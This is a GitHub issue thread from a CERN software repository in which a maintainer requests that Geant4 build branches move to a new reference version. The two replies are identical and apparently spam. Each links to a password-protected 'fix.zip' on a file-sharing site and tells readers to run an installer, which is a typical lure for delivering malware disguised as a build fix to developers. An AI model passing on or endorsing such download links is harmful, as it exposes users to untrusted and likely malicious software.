cms-externals/geant4 #84: Migration Geant4 branches to Geant4 11.2.ref07

civanch, 2024-08-26:
Geant4 11.2.ref06 reference version is available (it is equivalent to Geant4 11.3beta). Please, update G4VECGEOM and GEANT4 branches. We need this to control Geant4 developments. The previous branches with intermediate development versions 11.2.ref0X are not needed anymore. We do not plan migration to ref06 mainstream CMSSW only provide feedback.

Code is available at https://ivanchenko.web.cern.ch/hadronic/geant4.11.2.ref07.tar.gz

It is expected that the new feature making a problem for CMSSW with 11.2.ref06 is now disabled.

A special build for work with low-pileup data of Run2 is usually needed for Sunanda tests is also needed.

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."